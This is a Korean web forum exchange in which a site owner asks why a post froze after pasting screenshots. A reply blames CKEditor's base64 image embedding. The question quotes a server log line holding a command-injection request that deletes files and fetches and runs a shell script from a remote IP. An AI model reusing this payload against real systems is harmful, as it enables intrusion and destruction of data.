한창 스샷찍고 ctrl+v 로 사진 복붙하면서 글을 쓰던중에 업로드를 눌렀더니 갑자기 화면이 먹통이 됐습니다.
다른 브라우저로 접속하니 다른 글들은 정상적으로 출력이 되고 잘 읽히는데, 해당글을 누르면 아무것도 화면이 나오지 않고(빈화면) 뒤로가기도 안눌러졌습니다.
당황해서 관리자 권한으로 문서 삭제했는데,
이런현상은 ctrl+V 로 사진을 복붙해서 발생한건가요?
클라우드 플레어에서 핫링크 방지를 해놨는데, 다른 사이트에서 제 사이트 이미지를 못긁어갈 뿐만이 아니라 저도 클립보드에서 사진을 복붙 못하게 되나요??
에러로그를 보니까
request: "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F94.156.79.129%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1", host: (사이트 아이피)
"요청은 모든 파일을 삭제하고(rm -rf *) 디렉토리를 /tmp로 변경하고 http://94.156.79.129/tenda.sh에서 스크립트를 다운로드하고 실행 권한을 부여하는 셸 명령을 실행하려고 시도하고 있습니다. 다운로드한 스크립트(chmod 777 tenda.sh)에 대한 권한을 부여한 다음 스크립트(./tenda.sh)를 실행합니다."
라고 떴습니다.
단순히 ctrl +v 해서 생긴 문제가 아니라 사이트 해킹 급이 이뤄진 상황같은데...
마침 제가 사이트에 코딩에 관련한 내용을 쓰고 있었거든요. 제가 코드를 복붙 사진 복붙을 하면서 급하게 등록 버튼을 눌러서 이게 에러가 이렇게 날 수 도 있는건가요?
해킹 시도는 하루에도 수백 수천 번씩 랜덤으로 들어옵니다. 성공했는지가 문제죠. 님 사이트에 /cgi-bin/luci 어쩌고 하는 파일이 실제로 존재하는 것이 아니라면 신경 안 쓰셔도 됩니다. 요즘 세상에 /cgi-bin/이라는 경로로 프로그램을 실행할 수 있는 서버가 있다면 솔직히 그냥 해킹당해도 싸죠...
이미지를 복붙하면 CKEditor가 base64로 변환해서 소스에다가 그대로 박아 버립니다. 안 그래도 이미지 용량이 큰데 base64로 변환하면 더 커질 테고, 수십MB에 달하는 base64 코드를 DB에 저장하면... 다시 불러오는 과정에서 터질 만도 하죠. 원래 안 이랬는데 CKEditor 측에서 쓸데없는 기능을 만들어 넣는 바람에ㅡ.ㅡ 라이믹스에서 조만간 이걸 막아 버리거나, 다른 어떤 방법으로라도 땜빵해야 할 것 같습니다.